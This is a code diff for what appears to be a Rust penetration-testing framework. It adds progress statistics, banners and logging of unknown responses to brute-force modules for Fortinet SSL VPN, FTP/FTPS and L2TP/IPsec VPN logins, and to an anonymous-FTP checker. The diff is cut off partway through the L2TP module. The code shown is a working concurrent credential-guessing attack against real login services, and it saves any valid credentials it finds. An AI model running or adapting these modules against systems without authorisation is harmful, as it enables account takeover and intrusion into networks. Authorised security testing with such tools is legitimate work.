||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_final(&self) {
|
||||
println!();
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
|
||||
println!("{}", "=== Statistics ===".bold());
|
||||
println!(" Total attempts: {}", total);
|
||||
println!(" Successful: {}", success.to_string().green().bold());
|
||||
println!(" Failed: {}", failed);
|
||||
println!(" Errors: {}", errors.to_string().red());
|
||||
println!(" Elapsed time: {:.2}s", elapsed);
|
||||
if elapsed > 0.0 {
|
||||
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ Fortinet SSL VPN Brute Force Module ║".cyan());
|
||||
println!("{}", "║ FortiGate Web Login Credential Testing ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("=== Fortinet SSL VPN Brute Force Module ===");
|
||||
println!("[*] Target: {}", target);
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
|
||||
let port: u16 = loop {
|
||||
let input = prompt_default("Fortinet VPN Port", "443")?;
|
||||
@@ -105,6 +186,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
let found_credentials = Arc::new(Mutex::new(Vec::new()));
|
||||
let stop_signal = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
|
||||
println!("\n[*] Starting brute-force on {}", base_url);
|
||||
println!("[*] Timeout: {} seconds", timeout_secs);
|
||||
@@ -146,6 +228,20 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
};
|
||||
|
||||
println!("[*] Testing {} credential combinations", credential_pairs.len());
|
||||
println!();
|
||||
|
||||
// Start progress reporter
|
||||
let stats_clone = stats.clone();
|
||||
let stop_clone = stop_signal.clone();
|
||||
let progress_handle = tokio::spawn(async move {
|
||||
loop {
|
||||
if stop_clone.load(Ordering::Relaxed) {
|
||||
break;
|
||||
}
|
||||
stats_clone.print_progress();
|
||||
sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS)).await;
|
||||
}
|
||||
});
|
||||
|
||||
let mut tasks = FuturesUnordered::new();
|
||||
|
||||
@@ -160,6 +256,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let found_credentials_clone = Arc::clone(&found_credentials);
|
||||
let stop_signal_clone = Arc::clone(&stop_signal);
|
||||
let semaphore_clone = Arc::clone(&semaphore);
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let verbose_flag = verbose;
|
||||
let stop_on_success_flag = stop_on_success;
|
||||
|
||||
@@ -186,18 +283,25 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
timeout_duration
|
||||
).await {
|
||||
Ok(true) => {
|
||||
println!("[+] {} -> {}:{}", base_url_clone, user, pass);
|
||||
println!("\r{}", format!("[+] {} -> {}:{}", base_url_clone, user, pass).green().bold());
|
||||
let mut found = found_credentials_clone.lock().await;
|
||||
found.push((base_url_clone.clone(), user.clone(), pass.clone()));
|
||||
stats_clone.record_attempt(true, false);
|
||||
if stop_on_success_flag {
|
||||
stop_signal_clone.store(true, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
Ok(false) => {
|
||||
log(verbose_flag, &format!("[-] {} -> {}:{}", base_url_clone, user, pass));
|
||||
stats_clone.record_attempt(false, false);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[-] {} -> {}:{}", base_url_clone, user, pass).dimmed());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
log(verbose_flag, &format!("[!] {}: error: {}", base_url_clone, e));
|
||||
stats_clone.record_attempt(false, true);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[!] {}: error: {}", base_url_clone, e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -208,15 +312,24 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
// Wait for all tasks to complete
|
||||
while let Some(res) = tasks.next().await {
|
||||
if let Err(e) = res {
|
||||
log(verbose, &format!("[!] Task join error: {}", e));
|
||||
if verbose {
|
||||
println!("\r{}", format!("[!] Task join error: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Stop progress reporter
|
||||
stop_signal.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.await;
|
||||
|
||||
// Print final statistics
|
||||
stats.print_final();
|
||||
|
||||
let creds = found_credentials.lock().await;
|
||||
if creds.is_empty() {
|
||||
println!("\n[-] No credentials found.");
|
||||
println!("{}", "[-] No credentials found.".yellow());
|
||||
} else {
|
||||
println!("\n[+] Valid credentials found:");
|
||||
println!("{}", format!("[+] Found {} valid credential(s):", creds.len()).green().bold());
|
||||
for (url, user, pass) in creds.iter() {
|
||||
println!(" {} -> {}:{}", url, user, pass);
|
||||
}
|
||||
@@ -293,13 +406,13 @@ async fn try_fortinet_login(
|
||||
form_data.insert("password", password.to_string());
|
||||
form_data.insert("ajax", "1".to_string());
|
||||
|
||||
if let Some(ref r) = realm {
|
||||
if let Some(r) = realm {
|
||||
if !r.is_empty() {
|
||||
form_data.insert("realm", r.clone());
|
||||
}
|
||||
}
|
||||
|
||||
if let Some(ref token) = csrf_token {
|
||||
if let Some(token) = csrf_token {
|
||||
form_data.insert("magic", token.clone());
|
||||
}
|
||||
|
||||
@@ -368,7 +481,7 @@ async fn try_fortinet_login(
|
||||
|
||||
// Check redirect location
|
||||
if status.as_u16() == 302 {
|
||||
if let Some(ref loc_str) = location_header {
|
||||
if let Some(loc_str) = location_header {
|
||||
if loc_str.contains("/remote/index")
|
||||
|| loc_str.contains("portal")
|
||||
|| loc_str.contains("index")
|
||||
@@ -490,12 +603,6 @@ fn load_lines<P: AsRef<Path>>(path: P) -> Result<Vec<String>> {
|
||||
.collect())
|
||||
}
|
||||
|
||||
fn log(verbose: bool, msg: &str) {
|
||||
if verbose {
|
||||
println!("{}", msg);
|
||||
}
|
||||
}
|
||||
|
||||
fn get_filename_in_current_dir(input_path_str: &str) -> PathBuf {
|
||||
let path = Path::new(input_path_str);
|
||||
let filename_component = path
|
||||
|
||||
@@ -1,8 +1,19 @@
|
||||
use anyhow::{anyhow, Result};
|
||||
use colored::*;
|
||||
use suppaftp::{AsyncFtpStream, AsyncNativeTlsFtpStream, AsyncNativeTlsConnector};
|
||||
use suppaftp::async_native_tls::TlsConnector;
|
||||
use tokio::time::{timeout, Duration};
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 5;
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ FTP Anonymous Login Checker ║".cyan());
|
||||
println!("{}", "║ Supports FTP and FTPS (TLS) with IPv4/IPv6 ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Format IPv4 or IPv6 addresses with port
|
||||
fn format_addr(target: &str, port: u16) -> String {
|
||||
if target.starts_with('[') && target.contains("]:") {
|
||||
@@ -25,6 +36,8 @@ fn format_addr(target: &str, port: u16) -> String {
|
||||
|
||||
/// Anonymous FTP/FTPS login test with IPv6 support
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
let addr = format_addr(target, 21);
|
||||
let domain = target
|
||||
.trim_start_matches('[')
|
||||
@@ -32,32 +45,36 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
.next()
|
||||
.unwrap_or(target);
|
||||
|
||||
println!("[*] Connecting to FTP service on {}...", addr);
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
println!("{}", format!("[*] Connecting to FTP service on {}...", addr).cyan());
|
||||
println!();
|
||||
|
||||
// 1️⃣ Try plain FTP first
|
||||
match timeout(Duration::from_secs(5), AsyncFtpStream::connect(&addr)).await {
|
||||
match timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS), AsyncFtpStream::connect(&addr)).await {
|
||||
Ok(Ok(mut ftp)) => {
|
||||
let result = ftp.login("anonymous", "anonymous").await;
|
||||
if let Ok(_) = result {
|
||||
println!("[+] Anonymous login successful (FTP)");
|
||||
if result.is_ok() {
|
||||
println!("{}", "[+] Anonymous login successful (FTP)".green().bold());
|
||||
let _ = ftp.quit().await;
|
||||
return Ok(());
|
||||
} else if let Err(e) = result {
|
||||
if e.to_string().contains("530") {
|
||||
println!("[-] Anonymous login rejected (FTP)");
|
||||
println!("{}", "[-] Anonymous login rejected (FTP)".yellow());
|
||||
return Ok(());
|
||||
} else if e.to_string().contains("550 SSL") {
|
||||
println!("[*] FTP server requires TLS — upgrading to FTPS...");
|
||||
println!("{}", "[*] FTP server requires TLS — upgrading to FTPS...".cyan());
|
||||
} else {
|
||||
return Err(anyhow!("FTP error: {}", e));
|
||||
}
|
||||
}
|
||||
}
|
||||
Ok(Err(e)) => println!("[!] FTP connection error: {}", e),
|
||||
Err(_) => println!("[-] FTP connection timed out"),
|
||||
Ok(Err(e)) => println!("{}", format!("[!] FTP connection error: {}", e).red()),
|
||||
Err(_) => println!("{}", "[-] FTP connection timed out".yellow()),
|
||||
}
|
||||
|
||||
// 2️⃣ Fallback to FTPS
|
||||
println!("{}", "[*] Attempting FTPS connection...".cyan());
|
||||
|
||||
let mut ftps = AsyncNativeTlsFtpStream::connect(&addr)
|
||||
.await
|
||||
.map_err(|e| anyhow!("FTPS connect failed: {}", e))?;
|
||||
@@ -75,11 +92,11 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
match ftps.login("anonymous", "anonymous").await {
|
||||
Ok(_) => {
|
||||
println!("[+] Anonymous login successful (FTPS)");
|
||||
println!("{}", "[+] Anonymous login successful (FTPS)".green().bold());
|
||||
let _ = ftps.quit().await;
|
||||
}
|
||||
Err(e) if e.to_string().contains("530") => {
|
||||
println!("[-] Anonymous login rejected (FTPS)");
|
||||
println!("{}", "[-] Anonymous login rejected (FTPS)".yellow());
|
||||
}
|
||||
Err(e) => return Err(anyhow!("FTPS login error: {}", e)),
|
||||
}
|
||||
|
||||
@@ -7,12 +7,94 @@ use std::{
|
||||
io::{BufRead, BufReader, Write},
|
||||
path::PathBuf,
|
||||
sync::Arc,
|
||||
time::Instant,
|
||||
};
|
||||
use std::path::Path;
|
||||
use std::sync::atomic::{AtomicBool, Ordering};
|
||||
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
|
||||
use tokio::{sync::{Mutex, Semaphore}, time::{sleep, Duration}};
|
||||
use futures::stream::{FuturesUnordered, StreamExt};
|
||||
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
|
||||
// Statistics tracking for progress reporting
|
||||
struct Statistics {
|
||||
total_attempts: AtomicU64,
|
||||
successful_attempts: AtomicU64,
|
||||
failed_attempts: AtomicU64,
|
||||
error_attempts: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_attempts: AtomicU64::new(0),
|
||||
successful_attempts: AtomicU64::new(0),
|
||||
failed_attempts: AtomicU64::new(0),
|
||||
error_attempts: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_attempt(&self, success: bool, error: bool) {
|
||||
self.total_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
if error {
|
||||
self.error_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else if success {
|
||||
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else {
|
||||
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
total.to_string().bold(),
|
||||
success.to_string().green(),
|
||||
failed,
|
||||
errors.to_string().red(),
|
||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_final(&self) {
|
||||
println!();
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
|
||||
println!("{}", "=== Statistics ===".bold());
|
||||
println!(" Total attempts: {}", total);
|
||||
println!(" Successful: {}", success.to_string().green().bold());
|
||||
println!(" Failed: {}", failed);
|
||||
println!(" Errors: {}", errors.to_string().red());
|
||||
println!(" Elapsed time: {:.2}s", elapsed);
|
||||
if elapsed > 0.0 {
|
||||
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ FTP Brute Force Module ║".cyan());
|
||||
println!("{}", "║ Supports FTP and FTPS (TLS) with IPv4/IPv6 ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Format IPv4 or IPv6 addresses with port
|
||||
fn format_addr(target: &str, port: u16) -> String {
|
||||
if target.starts_with('[') && target.contains("]:") {
|
||||
@@ -34,8 +116,8 @@ fn format_addr(target: &str, port: u16) -> String {
|
||||
}
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("=== FTP Brute Force Module ===");
|
||||
println!("[*] Target: {}", target);
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
|
||||
let port: u16 = loop {
|
||||
let input = prompt_default("FTP Port", "21")?;
|
||||
@@ -67,7 +149,9 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
let addr = format_addr(target, port);
|
||||
let found = Arc::new(Mutex::new(Vec::new()));
|
||||
let unknown = Arc::new(Mutex::new(Vec::<(String, String, String, String)>::new()));
|
||||
let stop = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
|
||||
println!("\n[*] Starting brute-force on {}", addr);
|
||||
|
||||
@@ -76,12 +160,31 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
println!("[!] Username wordlist is empty or invalid. Exiting.");
|
||||
return Ok(());
|
||||
}
|
||||
println!("{}", format!("[*] Loaded {} usernames", users.len()).cyan());
|
||||
|
||||
let passes = load_lines(&passwords_file)?;
|
||||
if passes.is_empty() {
|
||||
println!("[!] Password wordlist is empty or invalid. Exiting.");
|
||||
return Ok(());
|
||||
}
|
||||
println!("{}", format!("[*] Loaded {} passwords", passes.len()).cyan());
|
||||
|
||||
let total_attempts = if combo_mode { users.len() * passes.len() } else { passes.len() };
|
||||
println!("{}", format!("[*] Total attempts: {}", total_attempts).cyan());
|
||||
println!();
|
||||
|
||||
// Start progress reporter
|
||||
let stats_clone = stats.clone();
|
||||
let stop_clone = stop.clone();
|
||||
let progress_handle = tokio::spawn(async move {
|
||||
loop {
|
||||
if stop_clone.load(Ordering::Relaxed) {
|
||||
break;
|
||||
}
|
||||
stats_clone.print_progress();
|
||||
sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS)).await;
|
||||
}
|
||||
});
|
||||
|
||||
let mut tasks = FuturesUnordered::new();
|
||||
|
||||
@@ -95,8 +198,10 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let user_clone = user.clone();
|
||||
let pass_clone = pass.clone();
|
||||
let found_clone = Arc::clone(&found);
|
||||
let unknown_clone = Arc::clone(&unknown);
|
||||
let stop_clone = Arc::clone(&stop);
|
||||
let semaphore_clone = Arc::clone(&semaphore);
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let verbose_flag = verbose;
|
||||
let stop_on_success_flag = stop_on_success;
|
||||
|
||||
@@ -113,17 +218,41 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
}
|
||||
match try_ftp_login(&addr_clone, &user_clone, &pass_clone, verbose_flag).await {
|
||||
Ok(true) => {
|
||||
println!("[+] {} -> {}:{}", addr_clone, user_clone, pass_clone);
|
||||
println!("\r{}", format!("[+] {} -> {}:{}", addr_clone, user_clone, pass_clone).green().bold());
|
||||
found_clone.lock().await.push((addr_clone.clone(), user_clone.clone(), pass_clone.clone()));
|
||||
stats_clone.record_attempt(true, false);
|
||||
if stop_on_success_flag {
|
||||
stop_clone.store(true, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
Ok(false) => {
|
||||
log(verbose_flag, &format!("[-] {} -> {}:{}", addr_clone, user_clone, pass_clone));
|
||||
stats_clone.record_attempt(false, false);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[-] {} -> {}:{}", addr_clone, user_clone, pass_clone).dimmed());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
log(verbose_flag, &format!("[!] {}: error: {}", addr_clone, e));
|
||||
stats_clone.record_attempt(false, true);
|
||||
let msg = e.to_string();
|
||||
{
|
||||
let mut unk = unknown_clone.lock().await;
|
||||
unk.push((
|
||||
addr_clone.clone(),
|
||||
user_clone.clone(),
|
||||
pass_clone.clone(),
|
||||
msg.clone(),
|
||||
));
|
||||
}
|
||||
if verbose_flag {
|
||||
println!(
|
||||
"\r{}",
|
||||
format!(
|
||||
"[?] {} -> {}:{} error/unknown: {}",
|
||||
addr_clone, user_clone, pass_clone, msg
|
||||
)
|
||||
.yellow()
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
drop(permit);
|
||||
@@ -139,8 +268,10 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let addr_clone = addr.clone();
|
||||
let pass_clone = pass.clone();
|
||||
let found_clone = Arc::clone(&found);
|
||||
let unknown_clone = Arc::clone(&unknown);
|
||||
let stop_clone = Arc::clone(&stop);
|
||||
let semaphore_clone = Arc::clone(&semaphore);
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let verbose_flag = verbose;
|
||||
let stop_on_success_flag = stop_on_success;
|
||||
|
||||
@@ -157,17 +288,41 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
}
|
||||
match try_ftp_login(&addr_clone, &user, &pass_clone, verbose_flag).await {
|
||||
Ok(true) => {
|
||||
println!("[+] {} -> {}:{}", addr_clone, user, pass_clone);
|
||||
println!("\r{}", format!("[+] {} -> {}:{}", addr_clone, user, pass_clone).green().bold());
|
||||
found_clone.lock().await.push((addr_clone.clone(), user.clone(), pass_clone.clone()));
|
||||
stats_clone.record_attempt(true, false);
|
||||
if stop_on_success_flag {
|
||||
stop_clone.store(true, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
Ok(false) => {
|
||||
log(verbose_flag, &format!("[-] {} -> {}:{}", addr_clone, user, pass_clone));
|
||||
stats_clone.record_attempt(false, false);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[-] {} -> {}:{}", addr_clone, user, pass_clone).dimmed());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
log(verbose_flag, &format!("[!] {}: error: {}", addr_clone, e));
|
||||
stats_clone.record_attempt(false, true);
|
||||
let msg = e.to_string();
|
||||
{
|
||||
let mut unk = unknown_clone.lock().await;
|
||||
unk.push((
|
||||
addr_clone.clone(),
|
||||
user.clone(),
|
||||
pass_clone.clone(),
|
||||
msg.clone(),
|
||||
));
|
||||
}
|
||||
if verbose_flag {
|
||||
println!(
|
||||
"\r{}",
|
||||
format!(
|
||||
"[?] {} -> {}:{} error/unknown: {}",
|
||||
addr_clone, user, pass_clone, msg
|
||||
)
|
||||
.yellow()
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
drop(permit);
|
||||
@@ -178,17 +333,26 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
while let Some(res) = tasks.next().await {
|
||||
if let Err(e) = res {
|
||||
log(verbose, &format!("[!] Task panicked (likely due to forced shutdown or internal error): {}", e));
|
||||
if verbose {
|
||||
println!("\r{}", format!("[!] Task error: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Stop progress reporter
|
||||
stop.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.await;
|
||||
|
||||
// Print final statistics
|
||||
stats.print_final();
|
||||
|
||||
let creds = found.lock().await;
|
||||
if creds.is_empty() {
|
||||
println!("\n[-] No credentials found.");
|
||||
println!("{}", "[-] No credentials found.".yellow());
|
||||
} else {
|
||||
println!("\n[+] Valid credentials:");
|
||||
println!("{}", format!("[+] Found {} valid credential(s):", creds.len()).green().bold());
|
||||
for (host, user, pass) in creds.iter() {
|
||||
println!(" {} -> {}:{}", host, user, pass);
|
||||
println!(" {} {} -> {}:{}", "✓".green(), host, user, pass);
|
||||
}
|
||||
if let Some(path) = save_path {
|
||||
let file_path = get_filename_in_current_dir(&path);
|
||||
@@ -208,6 +372,53 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
drop(creds);
|
||||
|
||||
// Unknown / errored attempts
|
||||
let unknown_guard = unknown.lock().await;
|
||||
if !unknown_guard.is_empty() {
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[?] Collected {} unknown/errored FTP responses.",
|
||||
unknown_guard.len()
|
||||
)
|
||||
.yellow()
|
||||
.bold()
|
||||
);
|
||||
if prompt_yes_no("Save unknown responses to file?", true)? {
|
||||
let default_name = "ftp_unknown_responses.txt";
|
||||
let fname = prompt_default(
|
||||
&format!(
|
||||
"What should the unknown results be saved as? (default: {})",
|
||||
default_name
|
||||
),
|
||||
default_name,
|
||||
)?;
|
||||
let file_path = get_filename_in_current_dir(&fname);
|
||||
match File::create(&file_path) {
|
||||
Ok(mut file) => {
|
||||
writeln!(
|
||||
file,
|
||||
"# FTP Bruteforce Unknown/Errored Responses (host,user,pass,error)"
|
||||
)?;
|
||||
for (host, user, pass, msg) in unknown_guard.iter() {
|
||||
writeln!(file, "{} -> {}:{} - {}", host, user, pass, msg)?;
|
||||
}
|
||||
println!("[+] Unknown responses saved to '{}'", file_path.display());
|
||||
}
|
||||
Err(e) => {
|
||||
eprintln!(
|
||||
"[!] Could not create or write unknown response file '{}': {}",
|
||||
file_path.display(),
|
||||
e
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -367,12 +578,6 @@ fn load_lines<P: AsRef<Path>>(path: P) -> Result<Vec<String>> {
|
||||
.collect())
|
||||
}
|
||||
|
||||
fn log(verbose: bool, msg: &str) {
|
||||
if verbose {
|
||||
println!("{}", msg);
|
||||
}
|
||||
}
|
||||
|
||||
fn get_filename_in_current_dir(input: &str) -> PathBuf {
|
||||
Path::new(input)
|
||||
.file_name()
|
||||
|
||||
@@ -7,7 +7,8 @@ use std::{
|
||||
io::{BufRead, BufReader, Write},
|
||||
path::{Path, PathBuf},
|
||||
sync::Arc,
|
||||
sync::atomic::{AtomicBool, Ordering},
|
||||
sync::atomic::{AtomicBool, AtomicU64, Ordering},
|
||||
time::Instant,
|
||||
};
|
||||
use tokio::{
|
||||
process::Command,
|
||||
@@ -15,9 +16,89 @@ use tokio::{
|
||||
time::{sleep, Duration, timeout},
|
||||
};
|
||||
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
|
||||
struct Statistics {
|
||||
total_attempts: AtomicU64,
|
||||
successful_attempts: AtomicU64,
|
||||
failed_attempts: AtomicU64,
|
||||
error_attempts: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_attempts: AtomicU64::new(0),
|
||||
successful_attempts: AtomicU64::new(0),
|
||||
failed_attempts: AtomicU64::new(0),
|
||||
error_attempts: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_attempt(&self, success: bool, error: bool) {
|
||||
self.total_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
if error {
|
||||
self.error_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else if success {
|
||||
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else {
|
||||
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
total.to_string().bold(),
|
||||
success.to_string().green(),
|
||||
failed,
|
||||
errors.to_string().red(),
|
||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_final(&self) {
|
||||
println!();
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
|
||||
println!("{}", "=== Statistics ===".bold());
|
||||
println!(" Total attempts: {}", total);
|
||||
println!(" Successful: {}", success.to_string().green().bold());
|
||||
println!(" Failed: {}", failed);
|
||||
println!(" Errors: {}", errors.to_string().red());
|
||||
println!(" Elapsed time: {:.2}s", elapsed);
|
||||
if elapsed > 0.0 {
|
||||
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ L2TP/IPsec VPN Brute Force Module ║".cyan());
|
||||
println!("{}", "║ Requires strongswan, xl2tpd, or pppd ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("=== L2TP/IPsec VPN Brute Force Module ===");
|
||||
println!("[*] Target: {}", target);
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
|
||||
let port: u16 = loop {
|
||||
let input = prompt_default("L2TP/IPsec Port (IKE)", "500")?;
|
||||
@@ -104,6 +185,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let addr = normalize_target(target, port)?;
|
||||
let found_credentials = Arc::new(Mutex::new(Vec::new()));
|
||||
let stop_signal = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
|
||||
println!("\n[*] Starting brute-force on {}", addr);
|
||||
println!("[*] Timeout: {} seconds", timeout_secs);
|
||||
@@ -127,6 +209,23 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
}
|
||||
println!("[*] Loaded {} passwords", passwords.len());
|
||||
|
||||
let total_attempts = if combo_mode { users.len() * passwords.len() } else { passwords.len() };
|
||||
println!("{}", format!("[*] Total attempts: {}", total_attempts).cyan());
|
||||
println!();
|
||||
|
||||
// Start progress reporter
|
||||
let stats_clone = stats.clone();
|
||||
let stop_clone = stop_signal.clone();
|
||||
let progress_handle = tokio::spawn(async move {
|
||||
loop {
|
||||
if stop_clone.load(Ordering::Relaxed) {
|
||||
break;
|
||||
}
|
||||
stats_clone.print_progress();
|
||||
sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS)).await;
|
||||
}
|
||||
});
|
||||
|
||||
let semaphore = Arc::new(Semaphore::new(concurrency));
|
||||
let mut tasks: FuturesUnordered<_> = FuturesUnordered::new();
|
||||
let timeout_duration = Duration::from_secs(timeout_secs);
|
||||
@@ -149,6 +248,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let found_credentials_clone = Arc::clone(&found_credentials);
|
||||
let stop_signal_clone = Arc::clone(&stop_signal);
|
||||
let semaphore_clone = Arc::clone(&semaphore);
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let verbose_flag = verbose;
|
||||
let stop_on_success_flag = stop_on_success;
|
||||
|
||||
@@ -166,18 +266,25 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
match try_l2tp_login(&addr_clone, &user_clone, &pass_clone, &psk_clone, timeout_duration).await {
|
||||
Ok(true) => {
|
||||
println!("[+] {} -> {}:{}", addr_clone, user_clone, pass_clone);
|
||||
